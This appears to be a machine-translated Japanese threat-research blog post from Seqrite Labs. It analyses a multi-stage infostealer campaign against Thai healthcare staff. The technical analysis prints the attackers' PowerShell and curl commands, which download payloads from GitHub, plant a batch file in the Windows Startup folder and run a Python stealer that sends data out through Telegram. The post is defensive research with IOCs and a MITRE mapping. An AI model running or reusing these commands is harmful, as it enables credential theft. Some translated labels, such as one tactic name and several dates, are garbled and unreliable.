• 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
Seqrite ラボ Blog
営業担当者へ連絡 攻撃を受けているのか?
  • 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
ホーム  /  技術部門  タイの医療セクターを標的に、RARアーカイブを武器として利用する脅威アクター
脅威アクターがRARアーカイブを武器としてタイの医療セクターを標的に
19 6月 2026

脅威アクターがRARアーカイブを武器としてタイの医療セクターを標的に

著者 ヴァイブハブ・ビラデ
ヴァイブハブ・ビラデ
技術部門

著者: ヴァイバブ・クルシュナ・ビラード、ディクシット・パンチャル、ルマナ・シディキ。

目次

  • イントロダクション
  • 主なターゲット
  • 感染連鎖
  • 初期キャンペーン調査結果
  • テクニカル分析
    • ステージ1:初回配信(RARアーカイブ)
    • ステージ2:Rouki難読化バッチローダー
    • ステージ3:スタートアップ継続スクリプト
    • ステージ4:二次ペイロードの実行
    • ステージ5:情報窃盗装置の展開(sim.py)
  • 結論
  • Seqrite カバレッジ
  • 侵害の兆候(IOC)
  • MITRE ATT&CK マッピング

イントロダクション

Seqrite 当研究所は、脅威アクターとその攻撃キャンペーンを積極的に追跡・分析し、その特定、インフラ分析、および攻撃者の手法に重点を置いています。これまでの調査を通じて、地域および国際的な組織を標的とした、中国系およびその他の脅威グループによる多数の作戦を特定してきました。

最近の調査で、タイの医療分野、特に保健省職員および関連医療機関を標的としたマルウェア攻撃が活発に行われていることを確認しました。この攻撃は、医療をテーマにしたスピアフィッシングの誘い文句を利用し、難読化されたバッチスクリプトと実行可能ペイロードを含む悪意のあるRARアーカイブを介して配信されます。感染経路は、難読化、GitHubをホストしたペイロード配信、永続化メカニズム、および情報窃盗マルウェアなど、複数の段階を経ており、標的環境内に侵入して検出を回避するように設計されています。

主なターゲット

このキャンペーンは主に、タイの医療エコシステム全体の職員と部署を対象としており、具体的には以下のとおりです。

  • 保健省職員や政府の医療機器調達チームを装い、公式の医療機器承認書類を偽装したおとり捜査を行う。
  • 病院の管理スタッフは、偽造された患者入院申請書を通じて情報を入手した。
  • 放射線科および歯科クリニックのスタッフは、偽造された医療記録やX線検査依頼ファイルを通じて情報を入手した。
  • 臨床部門と放射線科は、偽の患者CTスキャン結果文書を通じて不正行為を行う。
  • 保健省の承認書類を通じて、医療サプライチェーンおよび医療機器調達チームを支援する。

これらの誘引テーマは、医療関連機能を意図的にターゲットにしていることを示唆しており、当該分野における業務フローに対する深い理解を示している。

感染連鎖

RARアーカイブ → 難読化BATローダー → Rouki難読化ペイロードローダー → 起動永続化スクリプト(WindowSecuryt.bat) → セカンダリバッチペイロード(u-t2.bat) → Pythonベースの情報窃盗ツール(sim.py) → Telegramからの情報漏洩試行

 

初期キャンペーン調査結果

このキャンペーンに関連して確認された最も古いサンプルは2026年4月7日にアップロードされ、最も新しいサンプルは2026年6月3日にアップロードされたことから、分析時点で約10週間の活動期間があったことが示唆される。

重要な所見

  • 特定されたサンプルはすべてタイからアップロードされており、これは国内の保管施設の使用、あるいは流通のために脆弱な現地システムが利用されたことを示唆している。
  • 攻撃者は、医療関連文書や政府関連文書を装った悪意のあるバッチスクリプトや実行ファイルを含むRARアーカイブを通じてマルウェアを配布する。
  • ルアーファイル名は、管理、臨床、放射線、調達担当者など、特定の職務に合わせて調整されており、これは医療機関に対する事前の偵察、あるいは業界特有の知識に基づいた広範なターゲティング戦略を示唆している。
  • 観測されたすべてのサンプルは、一貫したRAR → BAT → ペイロードの実行チェーンを使用しており、標準化されたツールセットと再現可能な配信方法を示唆している。

テクニカル分析

ステージ1:初回配信(RARアーカイブ)

初期感染経路は、難読化されたバッチファイルを含む悪意のあるRARアーカイブで構成されており、このバッチファイルが第一段階のローダーとして機能します。難読化は、機能を隠蔽し、静的解析を妨害するために広く用いられています。

観測されたサンプルの一つであるHealth_Ministry_Approved_Equipment_2026.batは、エンコードされたペイロードデータを含む一時ファイルを作成し、PowerShellを利用して埋め込まれたコンテンツをデコードします。デコードされたコンテンツは、その後、別のバッチファイルに書き込まれ、実行されます。

実行後、法医学的証拠を減らし、事後調査を複雑化させるために、一時的な証拠品は除去される。

埋め込みペイロードデータ、PowerShellベースのデコードルーチン、およびクリーンアップ操作の使用は、悪意のある機能を隠蔽し、セキュリティ制御を回避するための意図的な試みを示している。

ステージ2:Rouki難読化バッチローダー

ステージ1で実行された復号化されたpayload.batは、Roukiと呼ばれるフレームワークを使用して高度に難読化されていた。

分析の結果、このスクリプトは動的にPowerShellコマンドを再構築して実行し、追加のマルウェアコンポーネントをダウンロード、永続化、実行することが明らかになった。GitHubでホストされるペイロード、偽装ファイル拡張子、および多段階実行を用いることで、運用上の柔軟性を確保しつつ、検出される可能性を低減している。

PowerShellコマンド1 – 永続化展開

powershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ud-7-te/ud-vtn/raw/main/up-t2.png', 'C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecuryt.bat');”

このコマンドは、PNG画像に見せかけたリモートホスト上のファイルをダウンロードし、Windowsのスタートアップフォルダ内にWindowSecuryt.batという名前で保存します。

スタートアップディレクトリ内に配置することで、ユーザーがシステムにログインするたびに自動的に実行され、永続性が確保されます。

PowerShellコマンド2 – ペイロードの展開

powershell.exe -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/d7-te/vtn/raw/main/T2.zip', 'C:\Users\Public\Desktops.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Public\Desktops.zip', 'C:\Users\Public\Desktops'); Start-Sleep -Seconds 1; C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py; del C:\Users\Public\Desktops.zip”

このコマンドはZIPアーカイブをダウンロードし、その内容を一般公開されているディレクトリに展開し、同梱されているPythonインタープリタを使用して、埋め込まれたPythonベースのペイロード(sim.py)を実行します。

実行後、フォレンジック調査の痕跡を最小限に抑え、インシデント対応の妨げにならないように、ZIPアーカイブは削除されます。

ステージ3:起動時の永続化スクリプト(WindowSecuryt.bat)

ダウンロードしたWindowSecuryt.batスクリプトを解析した結果、初期段階のバッチローダーで確認されたものと同様の、大量の不要なデータと難読化ロジックが含まれていることが判明した。これらの機能しないコンテンツは、静的解析を妨害し、スクリプトの実際の実行フローを隠蔽することを目的としている。

スクリプトは実行時に、権限チェックと環境設定を行い、最終的な機能段階に到達した後、以下のコマンドを再構築して実行します。

cmd /c “curl hxxps://raw.githubusercontent.com/ud-7-te/ud-vtn/main/ud-t2.txt -o C:\Users\admin\AppData\Local\Temp\u-t2.bat && call C:\Users\admin\AppData\Local\Temp\u-t2.bat”

このコマンドはcurlを使用して、GitHubでホストされているリポジトリから追加のバッチペイロード(u-t2.bat)をダウンロードし、システムの一時ディレクトリ(%TEMP%)に保存します。%TEMP%パスを使用することで、ほとんどの環境で管理者権限を必要とせずに書き込みアクセスが可能になります。

ダウンロードが成功すると、スクリプトは直ちにcallコマンドを使用してペイロードを実行し、多段階感染チェーンの継続を可能にする。

スタートアップフォルダへの永続的なアクセスとリモートから取得可能なペイロードの組み合わせにより、攻撃者は元の永続化メカニズムを変更することなく、悪意のある機能を更新することが可能になります。

さらに、スクリプトがWindowsのスタートアップフォルダ内に配置されているため、永続性が確保され、ユーザーのログオン時に自動的に実行されます。これにより、攻撃者は元の永続化メカニズムを変更することなく、リモートのGitHubインフラストラクチャから更新されたペイロードを繰り返し取得して実行することができ、感染チェーンを柔軟かつ長期的に制御することが可能になります。

ステージ4:二次ペイロードの実行(u-t2.bat)

ダウンロードしたu-t2.batスクリプトを解析した結果、感染チェーンにおける以前のバッチコンポーネントと同様に、不要なコードと難読化されたセクションが含まれていることが判明した。これらの機能を持たない要素はスクリプトの冒頭に現れ、静的解析を妨害し、実際の実行フローを隠蔽することを目的としている。意味のあるロジックはこれらの難読化されたセグメントのさらに奥深くに埋め込まれており、実行時にのみ解読される。

このスクリプトは、システムへのより高度なアクセス権限を取得するために、管理者権限で自身を再起動しようとします。

権限昇格が成功すると、スクリプトはユーザーの目に触れる機会を最小限に抑えながら、次の段階のペイロードを実行します。

最終実行段階では、以下のペイロードがトリガーされます。

powershell.exe -WindowStyle Hidden -Command “C:\Users\Public\Desktops\python C:\Users\Public\Desktops\Lib\sim.py”

このコマンドは、以前にデプロイされたPythonインタープリタを起動し、目に見える実行ウィンドウを抑制しながらsim.pyを実行します。

バンドルされたPythonランタイムを使用することで、対象システムに既存のPythonインストールが存在するかどうかに関わらず実行が可能になり、展開時の依存関係が軽減されます。

ステージ5:情報窃盗装置の展開(sim.py)

分析の結果、最終的に特定されたペイロードはsim.pyであり、これは同梱されているPython環境を通じて実行されるPythonベースの情報窃盗プログラムである。

実行後、このマルウェアはtaskkillコマンドを使用して、Google Chrome、Microsoft Edge、Brave、その他のChromiumベースのブラウザを含む複数のWebブラウザを強制終了します。このような動作は、ブラウザのデータベース、認証情報ストア、Cookie、セッションアーティファクトなど、アクティブなプロセスによってロックされている可能性のあるデータへのアクセスを狙う情報窃盗型マルウェアによく見られるものです。

観測された能力

  • ブラウザ関連のデータを収集します。
  • 保存されている認証情報とセッション情報を収集します。
  • 各ステージは一時ディレクトリ内にデータを収集しました。
  • 収集したデータをZIPアーカイブに圧縮します。
  • Telegramベースのインフラを利用した情報漏洩の試み。

実行ログから、ハードコードされたボットトークンとチャット識別子をTelegram Bot API経由で使用し、盗んだデータを攻撃者が管理するTelegramチャンネルに送信しようとする試みが繰り返し行われていたことが明らかになった。

データ流出要求には、被害者固有のメタデータが含まれていました。例えば、以下のようなものです。

  • システム識別子
  • ユーザー名情報
  • 収集されたデータカウンター
  • アーカイブ参照

api.telegram.orgとの通信時に接続タイムアウトが発生したため、観測された情報漏洩の試みは失敗に終わったものの、ブラウザデータの収集、ローカルでのステージング、アーカイブの作成、および送信の試みといった一連の行動から、ペイロードの情報窃盗能力が確認された。

全体として、このマルウェアは、認証情報の窃盗、セッションクッキーの収集、ローカルデータのステージング、アーカイブの生成、Telegramベースのデータ流出メカニズムなど、現代のPythonベースの窃盗マルウェアによく見られる特徴を示しています。

GitHubでホストされたペイロード配信、正規のシステムユーティリティ、階層的な難読化、および多段階実行の使用は、運用上の柔軟性と防御回避の両方に貢献する。

結論

Seqrite 研究所は、このキャンペーンがタイの医療分野を標的としたものであり、医療をテーマにしたソーシャルエンジニアリングの誘い文句、多段階バッチローダー、GitHubでホストされているペイロードインフラストラクチャ、およびPythonベースの情報窃盗マルウェアが利用されていると、中程度の確信度で評価している。

このキャンペーンは、RARアーカイブ、高度に難読化されたバッチスクリプト、スタートアップフォルダの悪用による永続化、段階的なペイロードの取得、およびTelegramを利用した情報漏洩の試みからなる、再現可能な配信手法を示している。

現在入手可能な証拠に基づくと、明確な犯人特定は不可能ですが、複数のサンプルで観察された運用上の一貫性から、この活動は単一の脅威アクター、あるいは密接に関連するグループによって行われていると考えられます。関連するインフラストラクチャ、ペイロードの進化、および被害者に関する継続的な監視により、犯人特定とキャンペーンの目的についてさらなる知見が得られる可能性があります。

医療分野の組織は、文書を装ったフィッシング攻撃に警戒し、不正なスタートアップフォルダの変更を監視し、外部ソースから入手した信頼できないスクリプトやバイナリの実行を制限する必要があります。

Seqrite 適用範囲:

  • Script.Trojan.Downloader.50836.GC
  • cld.script.trojan.1759432951

侵害の兆候(IOC):

ファイル名 SHA256
保健省承認機器_2026.rar E5F6D9D405819E6B05B5D8268A2E973294859AD65237EDE36AB612B536D0AC2B
保健省承認機器2026.bat 4EEBC38297A307D18784D6F9EBC8AA6E6F69860BE970CC70D9E544DEB1FF6CE0
ペイロード.bat F4D4B8CAC004BB63834C6DF436721BABD9464C09787C80B268D839E0AADA9F87
WindowSecuryt.bat 74BB6AD7E1310F30A3E24FD3CBBFFA2C0C41C64E89E5D0DD1D6900E96B914183
u-t2.bat 7709D8C34D490509F3624104611EB75A862944DD9D7A642F44514ADA16C85EE9
Desktops.zip 523388567630E4FBDC359F75232BF2AD82671A680D4BFDCE0237FC30DFEC4C80
スティーラー (SIM.PY) 442E0F4E822842922E7E4685840194E99FD68C7F0EC38C1925914B8F724D5865

 

MITRE ATT&CKマッピング:

戦略 技名 テクニックID
初期アクセス フィッシング:スピアフィッシング添付ファイル T1566.001
実行 コマンドおよびスクリプトインタープリター:Windowsコマンドシェル T1059.003
コマンドおよびスクリプト インタープリター: PowerShell T1059.001
ユーザーの実行:悪意のあるファイル T1204.002
防衛回避 難読化されたファイルまたは情報 T1027
なりすまし(BATがPNG/TXTに偽装) T1036
ホストでのインジケーターの削除:ファイルの削除 T1070.004
固執 レジストリ実行キー / スタートアップ フォルダー T1547.001
スタートアップフォルダ経由でのスケジュール実行 T1547
権限昇格 虐待度上昇制御メカニズム T1548
プーケットの魅力 システム所有者/ユーザーの発見 T1033
クレデンシャルアクセス パスワード ストアからの認証情報 T1555
Webブラウザからの認証情報 T1555.003
収集 収集したデータのアーカイブ T1560
ローカルシステムからのデータ T1005
情報リポジトリからのデータ T1213
コマンドおよび制御 Ingressツール転送(GitHubホスト型ペイロード) T1105
アプリケーション層プロトコル:Webプロトコル(HTTPS) T1071.001
正規サービスを介したプロキシ(GitHub) T1102
exfiltration Web サービスを介した漏洩 (Telegram Bot API) T1567
クラウドストレージ/ウェブサービスへのデータ流出 T1567.002

 

 以前の投稿管理方法 Digital Risk Protection Services サイバーリスクを軽減する
次の投稿  企業向けデジタルリスク保護サービスとは:完全ガイド...
ヴァイブハブ・ビラデ

ヴァイブハブ・ビラデについて

...

ヴァイバブ・ビラードの記事 »

関連記事

  • 信頼されたビジネスワークフローの悪用:多段階の偽装窃盗キャンペーン

    22年2026月XNUMX日
  • 払い戻しの裏側:GSTフィッシングからRemcos RATまで、多段階の.NET感染チェーン

    17年2026月XNUMX日
  • オペレーション・シャドウリクルート:ControlRとGoogleスプレッドシートを悪用し、インドの求職者を標的とした採用活動をテーマにしたマルウェアキャンペーン

    14年2026月XNUMX日
注目の著者
  • Seqrite
    Seqrite

    Seqrite は、大手企業向けサイバーセキュリティソリューションプロバイダーです。重点分野は…

    より多くの記事を読んで Seqrite
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    Jyoti Karlekar の記事をもっと読む
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    Bineesh P によるその他の記事を読む
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    サンジャイ・カトカーによるその他の記事を読む
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (341) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (51) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) data privacy (16) データ保護 (34) データセキュリティ (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) エンドポイントセキュリティ (113) エンタープライズセキュリティ (20) 悪用する (13) GDPR (14) マルウェア (76) マルウェア分析 (14) マルウェア攻撃 (23) MDM (27) Microsoft (15) MITER ATT&CK (14) ネットワークセキュリティ (26) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (31) ransomware攻撃 (31) ransomwareの保護 (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) 脅威の検出 (14) Threat Intelライセンス (21) UTM (34) 脆弱性 (16) ゼロトラスト (13)
Seqrite ラボ

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

続きを読む Seqrite

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • オンプレミス
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • マイクロビジネス
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • サイバーセキュリティと Data Privacy Awareness
資料
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • 理解する Data Privacy
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
  • プライバシーアワー
お問い合わせ
  • 登記事務所
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • 学校区概要 Seqrite
  • リーダーシップ
  • 受賞
  • ニュースルーム
パートナー
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite 認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約